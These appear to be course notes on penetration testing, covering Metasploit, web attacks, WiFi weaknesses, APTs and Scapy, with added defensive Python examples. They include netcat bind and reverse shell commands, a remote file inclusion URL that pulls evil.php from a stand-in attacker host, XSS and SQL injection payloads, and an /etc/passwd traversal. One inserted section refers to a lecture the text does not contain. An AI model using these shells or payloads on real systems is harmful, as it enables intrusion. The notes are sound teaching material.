Vulnerability taxonomy
1. Common Weakness Enumeration (CWE)
• It is a list of software and hardware weaknesses. (It is organized following three categories – "Research Concepts", "Development Concepts" and "Architectural Concepts".)
• It has to do with the weakness itself – not an instance within a product or system.
• It is supported by MITRE.
• Purpose:
  i. To facilitate the effective use of tools that can identify, find and resolve bugs, vulnerabilities and exposures in computer software before the programs are publicly distributed or sold.
• Benefits:
  i. Consumers – They can have assurance that the software they purchased has been reviewed for known types of security flaws.
  ii. Developers – They can describe their capabilities in terms of the standard CWEs.
2. Common Vulnerabilities and Exposures (CVE)
• It is a list of publicly disclosed computer security flaws. Every security flaw is assigned a CVE ID number.
• It has to do with the specific instance within a product or system – not the underlying flaw.
• It is supported by US-CERT, the US Department of Homeland Security, MITRE and development centers sponsored by the U.S. federal government.
• Definitions given in CVE:
  i. Vulnerability: The state of being exposed to an attacker who can maliciously gain full access to a network or system.
  ii. Exposure: A mistake in the software code or configuration that provides an attacker with indirect access to a network or system.
• Purpose of CVE:
  i. To standardize the way each known vulnerability and/or exposure is identified so that the CVE database is maintained.
  ii. Standard IDs provide security administrators with quick access to technical information about a specific threat across multiple CVE-compatible information sources.
3. Open Web Application Security Project (OWASP)
• It is a standard awareness document for developers and web application security. It represents a broad agreement about the most critical security risks to web applications.
Target Exploitation
➢ It is the next step after all the information gathering and scanning.
➢ This process will be simple if the attacker has obtained valuable information.
➢ Types of exploitation:
  i. Attack on clients
    ▪ Getting the IP of the target will be tricky if the target is a personal computer and the target's router assigns local (private) IPs to connected devices, as the IP that is visible may be the router's IP address.
    ▪ Client-side attacks are more effective if a reverse connection can be used.
  ii. Attack on servers
    ▪ Need to obtain the IP address of the target server.
    ▪ Attacks become simpler if the target is on the same network.
    ▪ Tools such as:
      • nmap
        o To gather information about the target server's OS ($ nmap -O <Target IP>)
        o To gather information about the version numbers of the programs that the target server is running ($ nmap -sV <Target IP>)
      • netcat
        o To connect to the target machine on a specific port ($ nc <Target IP> <Port no.>)
        o We can perform many actions such as file transfer using netcat (requires a shell)
Metasploit Modules
➢ A module is a piece of software that the Metasploit Framework uses to perform a task, such as exploiting or scanning a target.
Module Types
Exploit – It is a program that takes advantage of a specific vulnerability and provides attackers access to the target system. Typically, it carries a payload and delivers it to the target.
Payload – It is the actual code that executes on the target system after an exploit successfully executes. It can be a reverse shell payload or a bind shell payload. A backdoor.
Auxiliary – It does not require a payload; it is mainly used for information gathering, such as a scanner.
Basic commands of Metasploit
msfconsole – Run the Metasploit console in Kali Linux
help – Show instructions
search <keyword> – Look for possible exploits containing the keyword.
use – Use a specific exploit, payload or auxiliary.
show options – Display options for the current module.
set <option> <value> – Configure <option> to have a value of <value>
run – Execute auxiliary modules.
exploit – Start exploit modules.
back – Go back to the original console prompt.
clear – Clear the screen.
exit – Exit from Metasploit.
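Returning to the password hashing and entropy material of Lecture 4-1 above, here is an added Python example (not code from the lecture notes) that computes H = L log2 N and the length L needed for a target entropy, and shows how a per-user random salt defeats a precomputed (p, h) lookup table. The precomputed table and the passwords are constructed for illustration.

```python
import hashlib
import math
import secrets

# Added example, not from the lecture notes. The precomputed table and
# passwords below are constructed for illustration.

def entropy_bits(length, symbols):
    """H = L * log2(N): entropy of L characters drawn uniformly from N symbols."""
    return length * math.log2(symbols)

def min_length_for(bits, symbols):
    """L = H / log2(N), rounded up to a whole character."""
    return math.ceil(bits / math.log2(symbols))

def unsalted_hash(password):
    """Same password -> same digest for every user, so one precomputed
    (p, h) table reverses it for all of them."""
    return hashlib.sha256(password.encode()).hexdigest()

# Stand-in for a rainbow table: a few precomputed (p, h) pairs, keyed h -> p.
PRECOMPUTED = {unsalted_hash(p): p for p in ("password", "qwerty123", "mustang")}

def table_lookup(digest):
    """Reverse a digest by lookup (time/memory trade-off); None if absent."""
    return PRECOMPUTED.get(digest)

def salted_hash(password, salt):
    """Salt (random bits) is mixed into each password before hashing.
    PBKDF2 is used so that each guess is also deliberately slow."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000).hex()

def new_record(password):
    """Return (salt, digest) for storage; the salt is fresh 128 random bits per user."""
    salt = secrets.token_bytes(16)
    return salt, salted_hash(password, salt)

def verify(password, salt, digest):
    """Constant-time comparison of a login attempt against a stored record."""
    return secrets.compare_digest(salted_hash(password, salt), digest)

def demo():
    """Two users pick the same weak password 'qwerty123'."""
    unsalted = unsalted_hash("qwerty123")
    salt_a, rec_a = new_record("qwerty123")
    salt_b, rec_b = new_record("qwerty123")
    return {
        "entropy_8_chars_94_symbols": round(entropy_bits(8, 94), 1),  # 52.4
        "chars_for_20_bits_lowercase": min_length_for(20, 26),        # 5
        "chars_for_96_bits_94_symbols": min_length_for(96, 94),       # 15
        "unsalted_reversed": table_lookup(unsalted),                  # 'qwerty123'
        "salted_reversed": table_lookup(rec_a),                       # None
        "salted_records_differ": rec_a != rec_b,                      # True
        "login_ok": verify("qwerty123", salt_a, rec_a),               # True
    }
```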
Lecture 5-1: Target Exploitation (2) and Social Engineering
Payloads in Metasploit
3 types of payloads
Single(s) – Payloads that are self-contained and standalone. (They do not depend on other programs to run)
Stager(s) – Small programs that establish and maintain communication between the attacker and the victim.
Stage(s) – Payload components that are downloaded by the Stagers (usually big).
Shell
➢ It is a program that acts as a link between the user and the kernel. (Bash shell, cmd.exe, etc.)
➢ Hacker's POV – It is a command-line interface (CLI) that provides the hacker access to a remote target.
Bind shell vs Reverse shell
Bind shell
  o Shell provided to the attacker when: The attacker connects to the target.
  o Usually results from: A server-side attack.
  o How to create:
    ▪ On the target machine: $ nc -nvlp <Port Number>
    ▪ On the attacker's machine: $ nc <Target IP> <Port Number>
    ▪ The victim machine listens on a specific port number while the attacker machine connects to it.
Reverse shell
  o Shell provided to the attacker when: The victim connects to the attacker.
  o Usually results from: A client-side attack.
  o How to create:
    ▪ On the attacker's machine: $ nc -nvlp <Port Number>
    ▪ On the target machine: $ nc <Attacker IP> <Port Number>
    ▪ The attacker machine listens on a specific port number while the victim machine connects to it.
  o Useful when:
    ▪ Firewalls are present to block suspicious traffic, so bind shells cannot be created.
    ▪ The target is behind a private network.
    ▪ A stealthy and effective attack is needed.
Client side exploitation
➢ Meterpreter shell from Metasploit
➢ Trojan (similar to the Assignment's freesweep software)
  o They are programs which are supposed to do something which the users want but actually perform another, malicious act.
  o Capabilities
    ▪ Key-logger
    ▪ Adding the victim's system to a botnet
    ▪ Giving the attacker full access to the victim's machine (Backdoor)
    ▪ File transfer
  o Spreading – As trojans cannot spread by themselves, they rely on some social engineering tactics (email, website, CD, SMS).
  o Hiding – Difficult due to user awareness and effective anti-virus software.
Social Engineering
➢ It uses a broad range of malicious activities that rely on psychological manipulation to trick users into making security mistakes or giving away sensitive information.
➢ Importance – Since humans are the weakest link in cybersecurity, we are easily manipulated by others to do their bidding, making us vulnerable to social engineering information gathering and attacks.
➢ Attack process:
  1. Information gathering
    ▪ It is conducted via OSINT gathering over the Internet (or social networks), obtaining valuable information about the targeted individual or organization.
    ▪ Better insight about the target can be obtained by engaging the target physically, e.g., when involved in corporate events, parties or conferences.
  2. Identifying vulnerable individuals
    ▪ Someone who is important enough to have access to some valuable resources but not so high profile that they are closely monitored.
    ▪ Targets of interest could include the CIO (Chief Information Officer), CSO (Chief Security Officer), CFO (Chief Financial Officer), etc.
  3. Planning the attack
    ▪ The attack can be done physically or remotely. (Insider or remote attack)
    ▪ The plan often requires other social engineering skills such as charisma, a friendly phone voice or physical appearance.
  4. Execution
    ▪ The planned attack should be carried out with confidence and patience to observe and assess the result of target exploitation.
    ▪ Depending on the level of complexity of the attack, other technical apparatus such as fake websites and malware may need to be arranged.
Social engineering attack vectors
Phishing
  o Concept – Fraudulent messages are sent to trick a victim into revealing sensitive information. The messages might appear to come from a trustworthy source.
  o Types – Spear Phishing, Vishing (Voice Phishing), Smishing (SMS Phishing)
  o Examples
    ▪ Spear Phishing – Directed at certain individuals or organizations; prior to the phishing attempt, extensive information gathering is required in order to increase the probability of success.
    ▪ Vishing – Impersonating the target's company IT personnel.
    ▪ Smishing – Impersonating the M.O.H regarding COVID-19 concerns.
Baiting
  o Concept – The real-world Trojan horse that uses physical media and relies on the curiosity or greed of the victim to be executed.
  o Example – An attacker may create a disk featuring a corporate logo, available from the target's website, and label it "Promotion Result 2019 – Human Resources". The attacker then leaves the disk somewhere in the target company, which could attract some employees' attention.
Quid pro quo (something for something)
  o Concept – The hacker offers a service to his victim in exchange for sensitive information. This could bait the victim with irresistible offers such as cash rewards.
  o Example – An attacker posing as an IT employee at a company contacts as many employees as possible at the company, offering alleged IT support. In return, employees have to disable the antivirus on their machine, after which the fake technician can install malware on the victims' machines, posing as software updates.
Protection against social engineering
1. Organization's POV
  a. Principle of Least Privilege – An information security concept in which a user is given the minimum levels of access needed to perform their tasks.
  b. Establish an ID system – All employees, consultants and contractors are issued IDs when hired; ensure IDs are returned when their term with the organization has ended.
  c. Immediate action – Whenever suspicious activities and security breaches are noted.
  d. Safeguard trade secrets – Private and confidential information should be well kept and not easily accessible.
  e. Escort – All guests should be escorted at all times when on the premises.
  f. Password change – Require employees to change their passwords regularly (~3 months).
  g. Security awareness training – Mandatory cybersecurity training should be conducted regularly (~4-6 months).
2. Individual's POV
  a. Do not divulge private information – Social engineers might approach you via social media platforms.
  b. Do not click on suspicious website links – Fraudulent emails or SMS might contain links that request personal information such as your login credentials.
  c. Do not allow strangers to access your wireless network – Malware or a network analyzer might be put inside your system.
Lecture 5-2: Web Penetration
SQL Injection
➢ It allows the attacker to influence the SQL queries that an application passes to a back-end database. Usually, malicious code is placed in the SQL query via webpage input.
➢ Damages SQL injection can cause:
  o Tampering with existing data in the database
  o Disclosure of all data on the system (login credentials)
  o Voiding transactions or changing balances
  o Destroying the data in the database or making it unavailable
➢ Prevention
  o Use of parameterized statements – where data and code are separated (most effective). The whole xyz' 1=1#' is considered a string. (Parameterized statements ensure any user input is "converted" to a string instead of a logic operator.)
  o Filtering
    ▪ Make blacklists of known-to-be-dangerous patterns, characters, and commands. (e.g., union, etc.)
    ▪ Make whitelists of allowed operators.
  o Give users least privilege
    ▪ Following the Principle of Least Privilege, only give users sufficient/limited privileges in order to properly execute their tasks.
Web vulnerabilities: concept and prevention
File upload
  o Description – The attacker uploads any executable file, such as a PHP file, to a vulnerable website.
  o Tools used – Weevely, a PHP backdoor generator tool in Kali. Once the PHP file has been uploaded and executed, a backdoor is created between Kali and the target website for a stealthy web shell.
Command execution
  o Description – Attackers are able to execute OS commands on the target web server. It can be used to obtain a reverse shell by making the target server connect to the attacker's machine.
  o Example – Unix commands could be executed on the website to create a reverse shell and connect to Kali. On Kali, the attacker can execute non-interactive commands or do a file transfer.
Local file inclusion (LFI)
  o Description – A web vulnerability caused by mistakes made by a programmer of a website or web application. It is used to trick the web application into exposing or running files on the web server. (Directory Traversal is also possible)
  o Example – The attacker simply changes the URL from https://example-site.com/?module=contact.php to https://example-site.com/?module=/etc/passwd and, in the absence of proper filtering, the server will display the sensitive content of the /etc/passwd file → leads to further attacks.
Remote file inclusion (RFI)
  o Description – Listed as one of the OWASP Top 10 web application vulnerabilities. An attack conducted when the web application downloads and executes a remote file.
  o Example – The attacker could make the following HTTP request to trick the application into executing server-side malicious code, for example, a backdoor: http://example.com/?file=http://attacker.example.com/evil.php
Cross-Site Scripting (XSS)
XSS enables attackers to inject client-side script into webpages viewed by other users. (Code is NOT executed on the server)
Reflected (non-persistent) XSS
➢ Only works if the user visits a specially crafted URL.
➢ Example URL: http://victim.com/page.php?somevar=<script>alert("Hacked")</script>
Stored (persistent) XSS → More dangerous
➢ It is persistent as the malicious code can be stored in the page/database → the malicious code will be executed every time the page is loaded on any user's machine.
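As an added Python example covering both the SQL injection prevention points and the XSS examples above (not code from the lecture notes): the login query is shown with string concatenation next to the parameterized form the notes recommend, and page output is shown with and without escaping of untrusted input. The users table, comments and URL are constructed; SQLite is used, where a comment starts with -- rather than MySQL's #.

```python
import html
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Added example, not from the lecture notes. Database rows, comments and
# the URL below are constructed for illustration.

def make_db():
    """In-memory users table with two constructed accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn

def login_concat(conn, name, password):
    """Vulnerable: the input is pasted into the SQL text, so a quote in it
    ends the string and the rest is interpreted as SQL code."""
    query = ("SELECT name FROM users WHERE name = '" + name +
             "' AND password = '" + password + "'")
    return [row[0] for row in conn.execute(query)]

def login_param(conn, name, password):
    """Parameterized: data is bound to ? placeholders separately from the
    code, so the whole input stays a string value."""
    query = "SELECT name FROM users WHERE name = ? AND password = ?"
    return [row[0] for row in conn.execute(query, (name, password))]

# Constructed injection input: closes the string, adds a tautology and
# comments out the password check (SQLite comment syntax is --).
INJECTION = "xyz' OR 1=1 --"

ALLOWED_SORT = {"name"}  # whitelist for a query part that cannot be bound

def list_users_sorted(conn, column):
    """Identifiers cannot be parameterized, so only whitelisted values are used."""
    if column not in ALLOWED_SORT:
        raise ValueError("sort column not allowed: " + column)
    return [row[0] for row in conn.execute("SELECT name FROM users ORDER BY " + column)]

# --- XSS: escape untrusted input at the point it is written into HTML ---

def render_unsafe(value):
    return "<p>" + value + "</p>"

def render_safe(value):
    """html.escape turns < > & ' and double quotes into entities, so script stays text."""
    return "<p>" + html.escape(value, quote=True) + "</p>"

def reflected_page(url, safe=True):
    """Reflected case: the somevar query parameter is echoed into the page."""
    somevar = parse_qs(urlsplit(url).query).get("somevar", [""])[0]
    return (render_safe if safe else render_unsafe)(somevar)

COMMENTS = []  # stand-in for the database behind a persistent page

def store_comment(text):
    COMMENTS.append(text)

def comments_page(safe=True):
    """Stored case: every viewer gets whatever was saved, so escaping on
    output protects all of them."""
    render = render_safe if safe else render_unsafe
    return "".join(render(c) for c in COMMENTS)

def contains_script_tag(page):
    """Crude check a defender might run over rendered output."""
    return "<script" in page.lower()
```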
The difference between reflected and stored XSS attacks is that reflected XSS only works if the victim enters the webpage with a custom-edited URL, whereas stored XSS will be automatically executed for any user.
Methods to prevent XSS vulnerabilities:
1. Escape any untrusted input.
2. Minimize the manipulation of user input in HTML.
Lecture 6-1: Wireless Network Penetration and Privacy Tools
Basics of WiFi
➢ It is a consumer-friendly name for Wireless LAN technology based on the IEEE 802.11 standards.
Advantages
  o Convenience – It allows users to access network resources from the nearby vicinity.
  o Reduced cost – Savings in cost and labor associated with running physical cables.
Disadvantages
  o Range – Wireless network signals might be affected by interference or obstacles.
  o Speed – Greater drop in performance than wired networks, as wireless network signals are more subject to interference.
  o Expandability – Wireless networks can handle a suddenly increased number of clients, whereas in a wired network additional wiring will be required.
  o Security – Less secure than wired networks, as attackers can only intercept wired networks via physical access.
Wireless Networking Modes
Ad-hoc
  o Description
    ▪ Cost effective – It does not require any equipment except for wireless adapters.
    ▪ Peer-to-peer (P2P) communication – Suitable for small networks.
  o Best example – Mobile phone hotspot: devices can connect to the hotspot for Internet access.
Infrastructure
  o Description
    ▪ Access Point – It can provide Internet connectivity to multiple clients.
    ▪ Communication – All clients communicate with the AP.
    ▪ Connection – In order for clients to access the Internet via the AP, they will have to know the SSID (Service Set Identifier, WiFi name).
    ▪ Scalability – It is much more scalable than ad-hoc mode.
  o Best example – Home WiFi: any user can connect to the router provided they know the SSID (WiFi name) and the network key (password).
Monitor
  o Description
    ▪ Monitoring – It allows a user to monitor all traffic received on a wireless channel.
    ▪ It can also be used for packet sniffing; however, it only applies to wireless networks.
  o Best example – Airmon-ng script: puts the network card into monitor mode to capture packets even if they aren't directed to your computer.
Wired Equivalent Privacy (WEP): Vulnerabilities
➢ It was the first attempt at wireless protection. The goal was to add security to wireless networks by encrypting data: even if the data was intercepted, it would not be readable as the data had already been encrypted.
➢ However, it is almost out of rotation as it has serious security problems such as:
  o Initialization Vector (IV) problem
    ▪ The IV is only 24 bits long, short and reused. (A 24-bit IV allows for ~16.7 million possibilities; on a busy network, this number can easily be reached in a matter of hours.)
    ▪ WEP does not choose the IV at random.
    ▪ WEP does not use a counter to make the IV unique.
  o Weak algorithms problem
    ▪ The encryption algorithm used, RC4, is known to be weak.
    ▪ The integrity check algorithm, CRC-32, is known to be weak.
WiFi Protected Access (WPA/WPA2)
➢ Functionalities
  o Same goal as WEP, but stronger security. (WPA2 is based on stronger crypto functions like AES, CBC-MAC, etc.)
  o The client and the Access Point (AP) share a common secret (passphrase) called the "PMK", from which the 2 entities derive keys for encryption and authentication.
    ▪ PMK (Pairwise Master Key) – It is a passphrase pre-shared between the AP and the client.
    ▪ PTK (Pairwise Transient Key) – It is derived from the PMK as follows:
➢ Vulnerabilities
  o Key Reinstallation Attack (KRACK)
    ▪ The attacker manipulates and replays cryptographic handshake messages to trick the victim into reinstalling an already-in-use key.
    ▪ When the victim reinstalls the key, associated parameters such as the nonce are reset to their initial value.
    ▪ By forcing nonce reuse in this manner, the encryption protocol can be attacked (e.g., packets can be replayed, decrypted, forged).
    ▪ When a client joins a network, the 4-way handshake is executed to negotiate a fresh encryption key. The client installs this key after receiving message 3. If an acknowledgement is not received, message 3 is retransmitted to the client. Each time the client receives the message, the same encryption key is reinstalled, thereby resetting the nonce and the receive replay counter. The attacker can take advantage of nonce resets by collecting and replaying retransmissions of message 3, leading to an attack on the encryption protocol.
WPA/WPA2 Enterprise
➢ Whereas WPA/WPA2 uses a pre-shared key, WPA/WPA2 Enterprise uses an additional component called a Remote Authentication Dial-In User Service (RADIUS) server.
  o The RADIUS server manages client authentication and generates a PMK for each client.
  o The client and the AP agree on the supported security protocols based on the PMK.
  o The RADIUS server sends the PMK (of the authenticated client) to the AP.
  o The AP and the client generate a PTK (Pairwise Transient Key) for the current session → a secure tunnel between the client and the AP is established.
➢ Advantages of RADIUS:
  o The PMK (Pairwise Master Key) is unique to each user (client); it does not have to be shared with any other user.
  o Even if a client is revoked, we do not need to worry about the leakage of the PMK.
Lecture 6-2: Privacy Tools (2) & Miscellaneous Topics
Privacy
➢ The term "privacy" is a double-edged sword
  o It can provide a user with a state free from being watched.
  o It can provide a hacker with a tool that can hide the tracks of their attack.
➢ Anonymity – Providing privacy does not always mean providing anonymity, but anonymity is an essential part of privacy.
Privacy Tools
Virtual Private Network (VPN)
  o Definition – All the IP packets between the source and a VPN server are encrypted through IPSec. All Internet activity of the user is routed through the VPN server. A VPN can hide the user's physical location.
  o Examples – Originally VPN was created for employees to securely connect to their company's network remotely. Most companies use a VPN because it is cheaper than building a dedicated private network.
  o Limitations – It can compromise the anonymity and activity of the source. Wide access range – if a user is connecting to a corporate network from his home network and malware is present, it can spread to the computers in the corporate network.
Tor / Onion Routing
  o Definition – It directs Internet traffic through a volunteer overlay network consisting of more than 7000 relays (concealing a user's location and usage from anyone performing network surveillance). Tor users can use the Internet by connecting through a series of virtual tunnels rather than making a direct connection.
  o Examples – To create a private network path using Tor, the client builds a virtual circuit of encrypted connections (Onion Routing) one hop at a time through nodes on the network. Between each hop, a separate set of encryption keys is negotiated to ensure that each hop can't trace these connections as they pass through. Maximum 1 hop per node in the circuit.
  o Limitations – A user's misconfiguration can lead to a compromise of anonymity.
Internet Protocol Security (IPSec)
  o Definition – It is a group of protocols that are used together to set up encrypted connections between devices. It is a framework of open standards that provides, between participating peers at the IP layer: 1. Data confidentiality 2. Data integrity 3. Data authentication. IPSec can protect data flows between: 1. A pair of hosts 2. A pair of security gateways 3. A security gateway and a host.
  o Examples – The most popular application of IPSec is a VPN. Tunnel mode – the default mode: IPSec wraps the original IP packet, encrypts it, adds a new IP header, and sends it to the other side of the VPN tunnel. Transport mode – only the payload of the IP packet is encrypted. (Does not provide full anonymity, as the IP address is revealed)
DNS Encryption
  o Definition – A DNS query leaks information about the sites the user is communicating with. An ISP can snoop on the entries in the DNS server it is running.
  o Examples – DNS over HTTPS: encrypts all DNS queries through TLS.
Protection based on cryptography (GPG)
  o Definition – It can use both symmetric and asymmetric encryption to encrypt, decrypt and sign messages using public and private keys.
  o Examples – It allows sensitive information to be easily shared across an insecure network. Even if a malicious actor manages to intercept the message, he does not have the correct private key to decrypt it.
➢ Anonymity-friendly Search Engines
  o Every major search engine today tracks almost 100% of the searches users perform. (Google, Yahoo, Bing)
  o DuckDuckGo – One step this search engine takes to protect user privacy is not to use the filtering system that major search engines use to offer "personalized results".
  o Private browsing mode – Browsers such as Google Chrome have a function called "Incognito mode". Users can browse privately, and all search history will be cleared once the user quits the browser.
➢ Other methods of protecting a hacker's identity
  o Change the MAC address
  o Use public WiFi with a VPN
  o Boot a machine from a "live CD" and remove it when you are done. (It will operate totally in RAM)
➢ Zero-Day vulnerability
  o A vulnerability in a system that is not yet disclosed to the public, and therefore not yet patched.
  o Even though the vulnerability might not be publicly known, other hackers or people who paid for the zero-day vulnerability might be quietly exploiting it.
➢ Zero-Day exploit
  o It is the code that attackers use to take advantage of the Zero-Day vulnerability.
  o Attackers might use the exploit code to plant a virus or malware (Trojan Horse) onto a machine.
  o Zero-day exploit code is extremely valuable and is used not only by hackers but also by government intelligence/spy agencies.
Zero Day Markets
Black market
  o Description – Criminal hackers sell/trade Zero-Day vulnerabilities or exploits to anyone who is willing to offer a reward (cash reward/favors), or keep them for their own personal usage.
  o Example – Criminal hackers can take advantage of the Zero-Day to issue ransomware to companies (for example), usually in exchange for huge cash rewards.
Grey market
  o Description – Defense contractors sell Zero-Day vulnerabilities or exploits to government intelligence agencies to use for surveillance and offensive computer operations.
  o Example – Often purchased by governments secretly, to ensure no one else knows about these vulnerabilities.
White market
  o Description – Researchers or hackers disclose Zero-Day vulnerabilities or exploits to vendors, in exchange for money.
  o Example – Apple has offered bounties up to $2 million for their new privacy security feature for their devices, Lockdown Mode.
Advanced Persistent Threat (APT)
➢ An attack campaign conducted by a hacker or a group of hackers to establish a long-term presence in a network in order to extract highly sensitive and valuable data.
➢ The hackers behind such a campaign are experienced and well-resourced; some of them are backed by government agencies to attack carefully chosen and researched targets (including key individuals from companies or governments).
➢ The sole purpose is to extract highly sensitive and valuable data that will give them a competitive advantage. (national security data or trade secrets)
➢ Unlike traditional hackers, who target a wide range of victims and move on to something less secure, APT actors will persistently attack their targets regardless of many failed attempts.
➢ APT attacks are usually stealthy, concealing themselves within the target's network and only interacting enough to achieve the defined objectives.
➢ Some of the APT actors might purchase and take advantage of Zero-Day vulnerabilities and exploits to gain access to the target's network/machine or to avoid detection.
Phases of APT
1. Reconnaissance/Information gathering
  o Attackers identify and study the targeted organization, collecting as much information as possible about the technical environment and key personnel in that organization.
  o Social engineering attacks and OSINT (Open Source Intelligence) gathering are used.
2. Delivery
  o Attackers deliver their exploits (malware) to the targets.
  o 2 types of delivery mechanisms:
    i. Direct delivery – The attackers send exploits to their targets via social engineering techniques (attack vectors), such as spear phishing.
    ii. Indirect delivery – Stealthy. Attackers compromise a 3rd party that is trusted by the target, and then use the compromised 3rd party to indirectly serve exploits.
3. Initial Intrusion
  o It happens when the attacker gets a first unauthorized access to the target's computer/network.
  o Upon delivering the exploit to the target in the delivery stage, the attacker gains access to the target's computer once the malicious code that exploits a vulnerability in the target's computer has been executed, or by using the user credentials obtained from social engineering attacks.
4. Command and control
  o After the attacker has successfully exploited a vulnerability in the target's computer, a backdoor is established.
  o The attacker uses Command and Control (C2) mechanisms to take control of the compromised computers, enabling further exploitation of the network.
  o To evade detection, attackers increasingly make use of various legitimate services and publicly available tools.
5. Lateral movement
  o Once communication between the compromised systems and the C2 servers has been established, the attackers move inside the network in order to expand their control over the targeted organization.
  o Lateral movement usually involves the following activities:
    i. Performing internal reconnaissance to map the network and acquire intelligence.
    ii. Compromising additional systems in order to harvest credentials and gain escalated privileges.
    iii. Identifying and collecting valuable digital assets, such as development plans, trade secrets, etc.
  o This stage typically lasts a long period because:
    i. The attackers want to harvest the maximum amount of information over the long term.
    ii. The attacks are designed to run low and slow in order to avoid detection.
    iii. As APT actors move deeper into the network, their movements become more difficult to detect.
6. Data exfiltration
  o Since one of the primary goals of an APT attack is to steal sensitive data in order to gain strategic benefits, this is a critical stage for the attackers.
  o Usually, the data is transferred to an internal staging server, where it is compressed and encrypted for transmission to external locations under the attackers' control.
  o In order to hide the transmission process, attackers make use of secure protocols such as SSL/TLS, or of the anonymity feature of the Tor network.
Ransomware
➢ It is a type of malware that threatens to publish the victim's data or permanently block access to it unless a ransom is paid.
➢ Cryptoviral extortion – An advanced technique where the victim's files are encrypted, making them inaccessible, and a ransom payment (via cryptocurrency) is demanded to decrypt them. Recovering the files without the decryption key is difficult, and digital currency is very difficult to trace → the malicious actor is difficult to trace as well.
  o Example – Garmin 2020: The hackers deployed the ransomware tool WastedLocker, which encrypts key data on a company's digital infrastructure; Garmin's services were disrupted. $10 million was demanded as ransom for the decryption key.
Scapy Reference Table for flags, example: XMAS flags
Flag:  CWR  ECE  URG  ACK  PSH  RST  SYN  FIN
Bit:    0    0    1    0    1    0    0    1
Binary 0010 1001 = hexadecimal 0x29
Therefore, the commands to craft a packet with the URG, PSH and FIN flags (Xmas) to Metasploitable2 port 80 are:
>>> a = IP(dst="10.0.2.4")
>>> b = TCP(dport=80, flags=0x29)
>>> c = a/b
>>> c
<IP frag=0 proto=tcp dst=10.0.2.4 |<TCP dport=http flags=FPU |>>
>>> sr1(c)
Command Syntax:
a = IP(dst="<Target IP>")
b = TCP(dport=<Port Number>, flags=<Hexadecimal> or "<Flag String>")
Examples using Metasploitable2's IP address & dport = 80 (http):
1. Craft a TCP packet with a SYN flag
2. Craft a TCP packet with a NULL flag
3. Craft a TCP packet with (URG, PSH, FIN) flags (similar to Xmas scan)
4. Run multiple ports from port 80 to 84
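An added Python example (not from the notes, and independent of Scapy) that builds and decodes the TCP flags byte in the bit order of the reference table above, produces Scapy's flag string (e.g. FPU for 0x29), and classifies a constructed set of packet records the way a defender would spot SYN, NULL and Xmas probes in a capture. The source address 10.0.2.15 and the packet list are constructed; 10.0.2.4 is the Metasploitable2 address used above.

```python
# Added example, not from the lecture notes and independent of Scapy.
# Bit order follows the reference table: CWR ECE URG ACK PSH RST SYN FIN
# from the most to the least significant bit of the flags byte.

FLAG_BITS = {"CWR": 0x80, "ECE": 0x40, "URG": 0x20, "ACK": 0x10,
             "PSH": 0x08, "RST": 0x04, "SYN": 0x02, "FIN": 0x01}

# Scapy prints flags with these letters, lowest bit first: F S R P A U E C.
SCAPY_LETTERS = [("FIN", "F"), ("SYN", "S"), ("RST", "R"), ("PSH", "P"),
                 ("ACK", "A"), ("URG", "U"), ("ECE", "E"), ("CWR", "C")]

def flags_value(names):
    """Numeric flags value for a set of flag names, e.g. URG+PSH+FIN -> 0x29."""
    return sum(FLAG_BITS[n] for n in names)

def flags_names(value):
    """Decode a flags byte back into flag names, in table order."""
    return [n for n, bit in FLAG_BITS.items() if value & bit]

def flags_string(value):
    """Scapy-style string form, e.g. 0x29 -> 'FPU', 0x02 -> 'S', 0 -> ''."""
    return "".join(letter for name, letter in SCAPY_LETTERS if value & FLAG_BITS[name])

def classify_probe(value):
    """Name the probe type a flags byte corresponds to; 'other' for normal traffic."""
    if value == 0:
        return "NULL"
    if value == flags_value(["URG", "PSH", "FIN"]):
        return "XMAS"
    if value == FLAG_BITS["SYN"]:
        return "SYN"
    return "other"

def probe_report(packets):
    """Count probe types per source over (src, dst, dport, flags) records,
    as a defender would when reviewing a capture for port scans."""
    report = {}
    for src, dst, dport, flags in packets:
        kind = classify_probe(flags)
        if kind == "other":
            continue
        per_src = report.setdefault(src, {"NULL": 0, "XMAS": 0, "SYN": 0, "ports": set()})
        per_src[kind] += 1
        per_src["ports"].add(dport)
    return report

# Constructed capture: one host sends Xmas probes to ports 80-84 and a NULL
# probe to port 22, while another host starts a normal handshake (SYN, then ACK).
SAMPLE_PACKETS = [
    ("10.0.2.15", "10.0.2.4", 80, 0x29),
    ("10.0.2.15", "10.0.2.4", 81, 0x29),
    ("10.0.2.15", "10.0.2.4", 82, 0x29),
    ("10.0.2.15", "10.0.2.4", 83, 0x29),
    ("10.0.2.15", "10.0.2.4", 84, 0x29),
    ("10.0.2.15", "10.0.2.4", 22, 0x00),
    ("10.0.2.7", "10.0.2.4", 80, 0x02),
    ("10.0.2.7", "10.0.2.4", 80, 0x10),
]
```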